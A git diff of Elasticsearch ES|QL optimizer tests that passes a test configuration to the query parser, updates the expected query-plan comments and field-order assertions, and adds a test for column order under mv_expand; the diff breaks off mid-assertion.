a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LogicalPlanOptimizerTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LogicalPlanOptimizerTests.java @@ -5254,20 +5254,26 @@ public void testEmptyMappingIndex() { TEST_VERIFIER ); - 
var plan = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement("from empty_test"))); + var plan = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement("from empty_test", EsqlTestUtils.TEST_CFG))); as(plan, LocalRelation.class); assertThat(plan.output(), equalTo(NO_FIELDS)); - plan = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement("from empty_test metadata _id | eval x = 1"))); + plan = logicalOptimizer.optimize( + analyzer.analyze(parser.createStatement("from empty_test metadata _id | eval x = 1", EsqlTestUtils.TEST_CFG)) + ); as(plan, LocalRelation.class); assertThat(Expressions.names(plan.output()), contains("_id", "x")); - plan = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement("from empty_test metadata _id, _version | limit 5"))); + plan = logicalOptimizer.optimize( + analyzer.analyze(parser.createStatement("from empty_test metadata _id, _version | limit 5", EsqlTestUtils.TEST_CFG)) + ); as(plan, LocalRelation.class); assertThat(Expressions.names(plan.output()), contains("_id", "_version")); plan = logicalOptimizer.optimize( - analyzer.analyze(parser.createStatement("from empty_test | eval x = \"abc\" | enrich languages_idx on x")) + analyzer.analyze( + parser.createStatement("from empty_test | eval x = \"abc\" | enrich languages_idx on x", EsqlTestUtils.TEST_CFG) + ) ); LocalRelation local = as(plan, LocalRelation.class); assertThat(Expressions.names(local.output()), contains(NO_FIELDS.get(0).name(), "x", "language_code", "language_name")); @@ -5962,7 +5968,7 @@ private void doTestSimplifyComparisonArithmetics( private void assertSemanticMatching(String expected, String provided) { BinaryComparison bc = extractPlannedBinaryComparison(provided); - LogicalPlan exp = analyzerTypes.analyze(parser.createStatement("FROM types | WHERE " + expected)); + LogicalPlan exp = analyzerTypes.analyze(parser.createStatement("FROM types | WHERE " + expected, EsqlTestUtils.TEST_CFG)); assertSemanticMatching(bc, extractPlannedBinaryComparison(exp)); } @@ -5990,7 +5996,7 @@ private Expression getComparisonFromLogicalPlan(LogicalPlan plan) { private void assertNotSimplified(String comparison) { String query = "FROM types | WHERE " + comparison; Expression optimized = getComparisonFromLogicalPlan(planTypes(query)); - Expression raw = getComparisonFromLogicalPlan(analyzerTypes.analyze(parser.createStatement(query))); + Expression raw = getComparisonFromLogicalPlan(analyzerTypes.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); assertTrue(raw.semanticEquals(optimized)); } @@ -6683,7 +6689,7 @@ public void testMultipleLookupShadowing() { public void testTranslateMetricsWithoutGrouping() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS max(rate(network.total_bytes_in))"; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Limit limit = as(plan, Limit.class); Aggregate finalAggs = as(limit.child(), Aggregate.class); assertThat(finalAggs, not(instanceOf(TimeSeriesAggregate.class))); @@ -6704,7 +6710,7 @@ public void testTranslateMetricsWithoutGrouping() { public void testTranslateMixedAggsWithoutGrouping() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS max(rate(network.total_bytes_in)), max(network.cost)"; - var plan = 
logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Limit limit = as(plan, Limit.class); Aggregate finalAggs = as(limit.child(), Aggregate.class); assertThat(finalAggs, not(instanceOf(TimeSeriesAggregate.class))); @@ -6729,7 +6735,7 @@ public void testTranslateMixedAggsWithoutGrouping() { public void testTranslateMixedAggsWithMathWithoutGrouping() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS max(rate(network.total_bytes_in)), max(network.cost + 0.2) * 1.1"; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Project project = as(plan, Project.class); Eval mulEval = as(project.child(), Eval.class); assertThat(mulEval.fields(), hasSize(1)); @@ -6767,7 +6773,7 @@ public void testTranslateMixedAggsWithMathWithoutGrouping() { public void testTranslateMetricsGroupedByOneDimension() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS sum(rate(network.total_bytes_in)) BY cluster | SORT cluster | LIMIT 10"; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); TopN topN = as(plan, TopN.class); Aggregate aggsByCluster = as(topN.child(), Aggregate.class); assertThat(aggsByCluster, not(instanceOf(TimeSeriesAggregate.class))); @@ -6792,7 +6798,7 @@ public void testTranslateMetricsGroupedByOneDimension() { public void testTranslateMetricsGroupedByTwoDimension() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS avg(rate(network.total_bytes_in)) BY cluster, pod"; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Project project = as(plan, Project.class); Eval eval = as(project.child(), Eval.class); assertThat(eval.fields(), hasSize(1)); @@ -6832,7 +6838,7 @@ public void testTranslateMetricsGroupedByTwoDimension() { public void testTranslateMetricsGroupedByTimeBucket() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS sum(rate(network.total_bytes_in)) BY bucket(@timestamp, 1h)"; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Limit limit = as(plan, Limit.class); Aggregate finalAgg = as(limit.child(), Aggregate.class); assertThat(finalAgg, not(instanceOf(TimeSeriesAggregate.class))); @@ -6866,7 +6872,7 @@ public void testTranslateMetricsGroupedByTimeBucketAndDimensions() { | SORT cluster | LIMIT 10 """; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Project project = as(plan, Project.class); TopN topN = as(project.child(), TopN.class); Eval eval = as(topN.child(), Eval.class); @@ -6908,7 +6914,7 @@ public void testTranslateSumOfTwoRates() { | SORT 
cluster | LIMIT 10 """; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); TopN topN = as(plan, TopN.class); Aggregate finalAgg = as(topN.child(), Aggregate.class); Eval eval = as(finalAgg.child(), Eval.class); @@ -6929,7 +6935,7 @@ public void testTranslateMixedAggsGroupedByTimeBucketAndDimensions() { | SORT cluster | LIMIT 10 """; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Project project = as(plan, Project.class); TopN topN = as(project.child(), TopN.class); Eval eval = as(topN.child(), Eval.class); @@ -6981,7 +6987,7 @@ public void testAdjustMetricsRateBeforeFinalAgg() { | SORT cluster | LIMIT 10 """; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Project project = as(plan, Project.class); TopN topN = as(project.child(), TopN.class); Eval evalDiv = as(topN.child(), Eval.class); @@ -7034,7 +7040,7 @@ public void testAdjustMetricsRateBeforeFinalAgg() { public void testTranslateMaxOverTime() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS sum(max_over_time(network.bytes_in)) BY bucket(@timestamp, 1h)"; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Limit limit = as(plan, Limit.class); Aggregate finalAgg = as(limit.child(), Aggregate.class); assertThat(finalAgg, not(instanceOf(TimeSeriesAggregate.class))); @@ -7063,7 +7069,7 @@ public void testTranslateMaxOverTime() { public void testTranslateAvgOverTime() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS sum(avg_over_time(network.bytes_in)) BY bucket(@timestamp, 1h)"; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Limit limit = as(plan, Limit.class); Aggregate finalAgg = as(limit.child(), Aggregate.class); assertThat(finalAgg, not(instanceOf(TimeSeriesAggregate.class))); @@ -7103,7 +7109,7 @@ public void testMetricsWithoutRate() { """); List plans = new ArrayList<>(); for (String query : queries) { - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); plans.add(plan); } for (LogicalPlan plan : plans) { @@ -7694,7 +7700,7 @@ public void testPruneRedundantOrderBy() { | mv_expand x | sort y """; - LogicalPlan analyzed = analyzer.analyze(parser.createStatement(query)); + LogicalPlan analyzed = analyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG)); LogicalPlan optimized = rule.apply(analyzed); // check that all the redundant SORTs are removed in a single run diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/OptimizerRulesTests.java 
b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/OptimizerRulesTests.java index b36cb3f6c6a42..fe4fd96120a01 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/OptimizerRulesTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/OptimizerRulesTests.java @@ -8,6 +8,7 @@ import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.xpack.esql.EsqlTestUtils; import org.elasticsearch.xpack.esql.core.expression.Alias; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; @@ -128,7 +129,7 @@ protected Expression rule(Expression e, LogicalOptimizerContext ctx) { }; rule.apply( - new EsqlParser().createStatement("FROM index | EVAL x=f1+1 | KEEP x, f2 | LIMIT 1"), + new EsqlParser().createStatement("FROM index | EVAL x=f1+1 | KEEP x, f2 | LIMIT 1", EsqlTestUtils.TEST_CFG), new LogicalOptimizerContext(null, FoldContext.small()) ); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/PhysicalPlanOptimizerTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/PhysicalPlanOptimizerTests.java index 99eded20b1687..7f4e1d4df6c82 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/PhysicalPlanOptimizerTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/PhysicalPlanOptimizerTests.java @@ -14,6 +14,7 @@ import org.elasticsearch.common.geo.ShapeRelation; import org.elasticsearch.common.lucene.BytesRefs; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.common.util.BigArrays; import org.elasticsearch.common.util.set.Sets; import org.elasticsearch.compute.aggregation.AggregatorMode; @@ -128,14 +129,17 @@ import org.elasticsearch.xpack.esql.plan.physical.LimitExec; import org.elasticsearch.xpack.esql.plan.physical.LocalSourceExec; import org.elasticsearch.xpack.esql.plan.physical.LookupJoinExec; +import org.elasticsearch.xpack.esql.plan.physical.MvExpandExec; import org.elasticsearch.xpack.esql.plan.physical.PhysicalPlan; import org.elasticsearch.xpack.esql.plan.physical.ProjectExec; import org.elasticsearch.xpack.esql.plan.physical.TopNExec; import org.elasticsearch.xpack.esql.plan.physical.UnaryExec; import org.elasticsearch.xpack.esql.planner.EsPhysicalOperationProviders; import org.elasticsearch.xpack.esql.planner.LocalExecutionPlanner; +import org.elasticsearch.xpack.esql.planner.PhysicalSettings; import org.elasticsearch.xpack.esql.planner.PlannerUtils; import org.elasticsearch.xpack.esql.planner.mapper.Mapper; +import org.elasticsearch.xpack.esql.plugin.EsqlFlags; import org.elasticsearch.xpack.esql.plugin.QueryPragmas; import org.elasticsearch.xpack.esql.querydsl.query.EqualsSyntheticSourceDelegate; import org.elasticsearch.xpack.esql.querydsl.query.SingleValueQuery; @@ -192,6 +196,7 @@ import static org.hamcrest.Matchers.closeTo; import static org.hamcrest.Matchers.contains; import static org.hamcrest.Matchers.containsInAnyOrder; +import static org.hamcrest.Matchers.containsInRelativeOrder; import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; @@ -624,16 +629,16 @@ public void testTripleExtractorPerField() { } /** - * Expected - * LimitExec[10000[INTEGER]] - * 
\_AggregateExec[[],[AVG(salary{f}#14) AS x],FINAL] - * \_AggregateExec[[],[AVG(salary{f}#14) AS x],PARTIAL] - * \_FilterExec[ROUND(emp_no{f}#9) > 10[INTEGER]] - * \_TopNExec[[Order[last_name{f}#13,ASC,LAST]],10[INTEGER]] - * \_ExchangeExec[] - * \_ProjectExec[[salary{f}#14, first_name{f}#10, emp_no{f}#9, last_name{f}#13]] -- project away _doc - * \_FieldExtractExec[salary{f}#14, first_name{f}#10, emp_no{f}#9, last_n..] -- local field extraction - * \_EsQueryExec[test], query[][_doc{f}#16], limit[10], sort[[last_name]] + *LimitExec[10000[INTEGER],8] + * \_AggregateExec[[],[SUM(salary{f}#13460,true[BOOLEAN]) AS x#13454],FINAL,[$$x$sum{r}#13466, $$x$seen{r}#13467],8] + * \_AggregateExec[[],[SUM(salary{f}#13460,true[BOOLEAN]) AS x#13454],INITIAL,[$$x$sum{r}#13466, $$x$seen{r}#13467],8] + * \_FilterExec[ROUND(emp_no{f}#13455) > 10[INTEGER]] + * \_TopNExec[[Order[last_name{f}#13459,ASC,LAST]],10[INTEGER],58] + * \_ExchangeExec[[emp_no{f}#13455, last_name{f}#13459, salary{f}#13460],false] + * \_ProjectExec[[emp_no{f}#13455, last_name{f}#13459, salary{f}#13460]] -- project away _doc + * \_FieldExtractExec[emp_no{f}#13455, last_name{f}#13459, salary{f}#1346..] <[],[]> -- local field extraction + * \_EsQueryExec[test], indexMode[standard], query[][_doc{f}#13482], limit[10], + * sort[[FieldSort[field=last_name{f}#13459, direction=ASC, nulls=LAST]]] estimatedRowSize[74] */ public void testExtractorForField() { var plan = physicalPlan(""" @@ -657,7 +662,7 @@ public void testExtractorForField() { var exchange = asRemoteExchange(topN.child()); var project = as(exchange.child(), ProjectExec.class); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("salary", "emp_no", "last_name")); + assertThat(names(extract.attributesToExtract()), contains("emp_no", "last_name", "salary")); var source = source(extract.child()); assertThat(source.limit(), is(topN.limit())); assertThat(source.sorts(), is(fieldSorts(topN.order()))); @@ -2208,7 +2213,7 @@ public void testNoPushDownChangeCase() { * ages{f}#6, last_name{f}#7, long_noidx{f}#13, salary{f}#8],false] * \_ProjectExec[[_meta_field{f}#9, emp_no{f}#3, first_name{f}#4, gender{f}#5, hire_date{f}#10, job{f}#11, job.raw{f}#12, langu * ages{f}#6, last_name{f}#7, long_noidx{f}#13, salary{f}#8]] - * \_FieldExtractExec[_meta_field{f}#9, emp_no{f}#3, first_name{f}#4, gen..]<[],[]> + * \_FieldExtractExec[_meta_field{f}#9, emp_no{f}#3, first_name{f}#4, gen..]<[],[]> * \_EsQueryExec[test], indexMode[standard], query[{"esql_single_value":{"field":"first_name","next":{"regexp":{"first_name": * {"value":"foo*","flags_value":65791,"case_insensitive":true,"max_determinized_states":10000,"boost":0.0}}}, * "source":"TO_LOWER(first_name) RLIKE \"foo*\"@2:9"}}][_doc{f}#25], limit[1000], sort[] estimatedRowSize[332] @@ -2329,10 +2334,10 @@ public void testPushDownUpperCaseChangeLike() { * uages{f}#7, last_name{f}#8, long_noidx{f}#14, salary{f}#9],false] * \_ProjectExec[[_meta_field{f}#10, emp_no{f}#4, first_name{f}#5, gender{f}#6, hire_date{f}#11, job{f}#12, job.raw{f}#13, lang * uages{f}#7, last_name{f}#8, long_noidx{f}#14, salary{f}#9]] - * \_FieldExtractExec[_meta_field{f}#10, gender{f}#6, hire_date{f}#11, jo..]<[],[]> + * \_FieldExtractExec[_meta_field{f}#10, gender{f}#6, hire_date{f}#11, jo..]<[],[]> * \_LimitExec[1000[INTEGER]] * \_FilterExec[LIKE(first_name{f}#5, "FOO*", true) OR IN(1[INTEGER],2[INTEGER],3[INTEGER],emp_no{f}#4 + 1[INTEGER])] - * \_FieldExtractExec[first_name{f}#5, emp_no{f}#4]<[],[]> + * 
\_FieldExtractExec[first_name{f}#5, emp_no{f}#4]<[],[]> * \_EsQueryExec[test], indexMode[standard], query[][_doc{f}#26], limit[], sort[] estimatedRowSize[332] */ public void testChangeCaseAsInsensitiveWildcardLikeNotPushedDown() { @@ -2447,22 +2452,17 @@ public void testPushDownEvalFilter() { /** * - * ProjectExec[[last_name{f}#21 AS name, first_name{f}#18 AS last_name, last_name{f}#21 AS first_name]] - * \_TopNExec[[Order[last_name{f}#21,ASC,LAST]],10[INTEGER],0] - * \_ExchangeExec[[last_name{f}#21, first_name{f}#18],false] - * \_ProjectExec[[last_name{f}#21, first_name{f}#18]] - * \_FieldExtractExec[last_name{f}#21, first_name{f}#18][] - * \_EsQueryExec[test], indexMode[standard], query[{ - * "bool":{"must":[ - * {"esql_single_value":{ - * "field":"last_name", - * "next":{"range":{"last_name":{"gt":"B","boost":1.0}}}, - * "source":"first_name > \"B\"@3:9" - * }}, - * {"exists":{"field":"first_name","boost":1.0}} - * ],"boost":1.0}}][_doc{f}#40], limit[10], sort[[ - * FieldSort[field=last_name{f}#21, direction=ASC, nulls=LAST] - * ]] estimatedRowSize[116] + * ProjectExec[[last_name{f}#13858 AS name#13841, first_name{f}#13855 AS last_name#13844, last_name{f}#13858 AS first_name#13 + * 847]] + * \_TopNExec[[Order[last_name{f}#13858,ASC,LAST]],10[INTEGER],100] + * \_ExchangeExec[[first_name{f}#13855, last_name{f}#13858],false] + * \_ProjectExec[[first_name{f}#13855, last_name{f}#13858]] + * \_FieldExtractExec[first_name{f}#13855, last_name{f}#13858]<[],[]> + * \_EsQueryExec[test], indexMode[standard], query[ + * {"bool":{"must":[{"esql_single_value":{"field":"last_name","next": + * {"range":{"last_name":{"gt":"B","boost":0.0}}},"source":"first_name > \"B\"@3:9"}}, + * {"exists":{"field":"first_name","boost":0.0}}],"boost":1.0}} + * ][_doc{f}#13879], limit[10], sort[[FieldSort[field=last_name{f}#13858, direction=ASC, nulls=LAST]]] estimatedRowSize[116] * */ public void testPushDownEvalSwapFilter() { @@ -2483,7 +2483,7 @@ public void testPushDownEvalSwapFilter() { var extract = as(project.child(), FieldExtractExec.class); assertThat( extract.attributesToExtract().stream().map(Attribute::name).collect(Collectors.toList()), - contains("last_name", "first_name") + contains("first_name", "last_name") ); // Now verify the correct Lucene push-down of both the filter and the sort @@ -2596,7 +2596,7 @@ public void testDissect() { * uages{f}#7, last_name{f}#8, long_noidx{f}#14, salary{f}#9, _index{m}#2],false] * \_ProjectExec[[_meta_field{f}#10, emp_no{f}#4, first_name{f}#5, gender{f}#6, hire_date{f}#11, job{f}#12, job.raw{f}#13, lang * uages{f}#7, last_name{f}#8, long_noidx{f}#14, salary{f}#9, _index{m}#2]] - * \_FieldExtractExec[_meta_field{f}#10, emp_no{f}#4, first_name{f}#5, ge..]<[],[]> + * \_FieldExtractExec[_meta_field{f}#10, emp_no{f}#4, first_name{f}#5, ge..]<[],[]> * \_EsQueryExec[test], indexMode[standard], query[{"wildcard":{"_index":{"wildcard":"test*","boost":0.0}}}][_doc{f}#27], * limit[1000], sort[] estimatedRowSize[382] * @@ -3165,6 +3165,56 @@ public void testProjectAwayAllColumnsWhenOnlyTheCountMattersInStats() { assertThat(Expressions.names(esQuery.attrs()), contains("_doc")); } + /** + * LimitExec[1000[INTEGER],336] + * \_MvExpandExec[foo_1{r}#4236,foo_1{r}#4253] + * \_TopNExec[[Order[emp_no{f}#4242,ASC,LAST]],1000[INTEGER],336] + * \_ExchangeExec[[_meta_field{f}#4248, emp_no{f}#4242, first_name{f}#4243, gender{f}#4244, hire_date{f}#4249, job{f}#4250, job. 
+ * raw{f}#4251, languages{f}#4245, last_name{f}#4246, long_noidx{f}#4252, salary{f}#4247, foo_1{r}#4236, foo_2{r}#4238], + * false] + * \_ProjectExec[[_meta_field{f}#4248, emp_no{f}#4242, first_name{f}#4243, gender{f}#4244, hire_date{f}#4249, job{f}#4250, job. + * raw{f}#4251, languages{f}#4245, last_name{f}#4246, long_noidx{f}#4252, salary{f}#4247, foo_1{r}#4236, foo_2{r}#4238]] + * \_FieldExtractExec[_meta_field{f}#4248, emp_no{f}#4242, first_name{f}#..]<[],[]> + * \_EvalExec[[1[INTEGER] AS foo_1#4236, 1[INTEGER] AS foo_2#4238]] + * \_EsQueryExec[test], indexMode[standard], query[][_doc{f}#4268], limit[1000], sort[[FieldSort[field=emp_no{f}#4242, + * direction=ASC, nulls=LAST]]] estimatedRowSize[352] + */ + public void testProjectAwayMvExpandColumnOrder() { + var plan = optimizedPlan(physicalPlan(""" + from test + | eval foo_1 = 1, foo_2 = 1 + | sort emp_no + | mv_expand foo_1 + """)); + var limit = as(plan, LimitExec.class); + var mvExpand = as(limit.child(), MvExpandExec.class); + var topN = as(mvExpand.child(), TopNExec.class); + var exchange = as(topN.child(), ExchangeExec.class); + var project = as(exchange.child(), ProjectExec.class); + + assertThat( + Expressions.names(project.projections()), + containsInRelativeOrder( + "_meta_field", + "emp_no", + "first_name", + "gender", + "hire_date", + "job", + "job.raw", + "languages", + "last_name", + "long_noidx", + "salary", + "foo_1", + "foo_2" + ) + ); + var fieldExtract = as(project.child(), FieldExtractExec.class); + var eval = as(fieldExtract.child(), EvalExec.class); + EsQueryExec esQuery = as(eval.child(), EsQueryExec.class); + } + /** * ProjectExec[[a{r}#5]] * \_EvalExec[[__a_SUM@81823521{r}#15 / __a_COUNT@31645621{r}#16 AS a]] @@ -5661,16 +5711,15 @@ public void testPushTopNWithFilterToSource() { } /** - * ProjectExec[[abbrev{f}#12321, name{f}#12322, location{f}#12325, country{f}#12326, city{f}#12327]] - * \_TopNExec[[Order[abbrev{f}#12321,ASC,LAST]],5[INTEGER],0] - * \_ExchangeExec[[abbrev{f}#12321, name{f}#12322, location{f}#12325, country{f}#12326, city{f}#12327],false] - * \_ProjectExec[[abbrev{f}#12321, name{f}#12322, location{f}#12325, country{f}#12326, city{f}#12327]] - * \_FieldExtractExec[abbrev{f}#12321, name{f}#12322, location{f}#12325, ..][] + * ProjectExec[[abbrev{f}#4474, name{f}#4475, location{f}#4478, country{f}#4479, city{f}#4480]] + * \_TopNExec[[Order[abbrev{f}#4474,ASC,LAST]],5[INTEGER],221] + * \_ExchangeExec[[abbrev{f}#4474, city{f}#4480, country{f}#4479, location{f}#4478, name{f}#4475],false] + * \_ProjectExec[[abbrev{f}#4474, city{f}#4480, country{f}#4479, location{f}#4478, name{f}#4475]] + * \_FieldExtractExec[abbrev{f}#4474, city{f}#4480, country{f}#4479, loca..]<[],[]> * \_EsQueryExec[airports], - * indexMode[standard], - * query[][_doc{f}#12337], - * limit[5], - * sort[[FieldSort[field=abbrev{f}#12321, direction=ASC, nulls=LAST]]] estimatedRowSize[237] + * indexMode[standard], + * query[][_doc{f}#4490], + * limit[5], sort[[FieldSort[field=abbrev{f}#4474, direction=ASC, nulls=LAST]]] estimatedRowSize[237] */ public void testPushTopNKeywordToSource() { var optimized = optimizedPlan(physicalPlan(""" @@ -5685,9 +5734,9 @@ public void testPushTopNKeywordToSource() { var exchange = asRemoteExchange(topN.child()); project = as(exchange.child(), ProjectExec.class); - assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city")); + assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name")); var extract = as(project.child(), 
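            /* Extracted attributes, like the projections asserted above, are now
               expected in alphabetical order: abbrev, city, country, location, name. */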
FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "location", "country", "city")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "location", "name")); var source = source(extract.child()); assertThat(source.limit(), is(topN.limit())); assertThat(source.sorts(), is(fieldSorts(topN.order()))); @@ -5703,13 +5752,13 @@ public void testPushTopNKeywordToSource() { /** * - * ProjectExec[[abbrev{f}#12, name{f}#13, location{f}#16, country{f}#17, city{f}#18, abbrev{f}#12 AS code]] - * \_TopNExec[[Order[abbrev{f}#12,ASC,LAST]],5[INTEGER],0] - * \_ExchangeExec[[abbrev{f}#12, name{f}#13, location{f}#16, country{f}#17, city{f}#18],false] - * \_ProjectExec[[abbrev{f}#12, name{f}#13, location{f}#16, country{f}#17, city{f}#18]] - * \_FieldExtractExec[abbrev{f}#12, name{f}#13, location{f}#16, country{f..][] - * \_EsQueryExec[airports], indexMode[standard], query[][_doc{f}#29], limit[5], - * sort[[FieldSort[field=abbrev{f}#12, direction=ASC, nulls=LAST]]] estimatedRowSize[237] + * ProjectExec[[abbrev{f}#7828, name{f}#7829, location{f}#7832, country{f}#7833, city{f}#7834, abbrev{f}#7828 AS code#7820]] + * \_TopNExec[[Order[abbrev{f}#7828,ASC,LAST]],5[INTEGER],221] + * \_ExchangeExec[[abbrev{f}#7828, city{f}#7834, country{f}#7833, location{f}#7832, name{f}#7829],false] + * \_ProjectExec[[abbrev{f}#7828, city{f}#7834, country{f}#7833, location{f}#7832, name{f}#7829]] + * \_FieldExtractExec[abbrev{f}#7828, city{f}#7834, country{f}#7833, loca..]<[],[]> + * \_EsQueryExec[airports], indexMode[standard], query[][_doc{f}#7845], limit[5], + * sort[[FieldSort[field=abbrev{f}#7828, direction=ASC, nulls=LAST]]] estimatedRowSize[237] * */ public void testPushTopNAliasedKeywordToSource() { @@ -5727,9 +5776,9 @@ public void testPushTopNAliasedKeywordToSource() { var exchange = asRemoteExchange(topN.child()); project = as(exchange.child(), ProjectExec.class); - assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city")); + assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name")); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "location", "country", "city")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "location", "name")); var source = source(extract.child()); assertThat(source.limit(), is(topN.limit())); assertThat(source.sorts(), is(fieldSorts(topN.order()))); @@ -5744,19 +5793,19 @@ public void testPushTopNAliasedKeywordToSource() { } /** - * ProjectExec[[abbrev{f}#11, name{f}#12, location{f}#15, country{f}#16, city{f}#17]] - * \_TopNExec[[Order[distance{r}#4,ASC,LAST]],5[INTEGER],0] - * \_ExchangeExec[[abbrev{f}#11, name{f}#12, location{f}#15, country{f}#16, city{f}#17, distance{r}#4],false] - * \_ProjectExec[[abbrev{f}#11, name{f}#12, location{f}#15, country{f}#16, city{f}#17, distance{r}#4]] - * \_FieldExtractExec[abbrev{f}#11, name{f}#12, country{f}#16, city{f}#17][] - * \_EvalExec[[STDISTANCE(location{f}#15,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) - * AS distance]] - * \_FieldExtractExec[location{f}#15][] + * ProjectExec[[abbrev{f}#7283, name{f}#7284, location{f}#7287, country{f}#7288, city{f}#7289]] + * \_TopNExec[[Order[distance{r}#7276,ASC,LAST]],5[INTEGER],229] + * \_ExchangeExec[[abbrev{f}#7283, city{f}#7289, country{f}#7288, location{f}#7287, name{f}#7284, 
distance{r}#7276],false] + * \_ProjectExec[[abbrev{f}#7283, city{f}#7289, country{f}#7288, location{f}#7287, name{f}#7284, distance{r}#7276]] + * \_FieldExtractExec[abbrev{f}#7283, city{f}#7289, country{f}#7288, name..]<[],[]> + * \_EvalExec[[STDISTANCE(location{f}#7287,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distan + * ce#7276]] + * \_FieldExtractExec[location{f}#7287]<[],[]> * \_EsQueryExec[airports], - * indexMode[standard], - * query[][_doc{f}#28], - * limit[5], - * sort[[GeoDistanceSort[field=location{f}#15, direction=ASC, lat=55.673, lon=12.565]]] estimatedRowSize[245] + * indexMode[standard], + * query[][_doc{f}#7300], + * limit[5], + * sort[[GeoDistanceSort[field=location{f}#7287, direction=ASC, lat=55.673, lon=12.565]]] estimatedRowSize[245] */ public void testPushTopNDistanceToSource() { var optimized = optimizedPlan(physicalPlan(""" @@ -5772,9 +5821,9 @@ public void testPushTopNDistanceToSource() { var exchange = asRemoteExchange(topN.child()); project = as(exchange.child(), ProjectExec.class); - assertThat(names(project.projections()), contains("abbrev", "name", 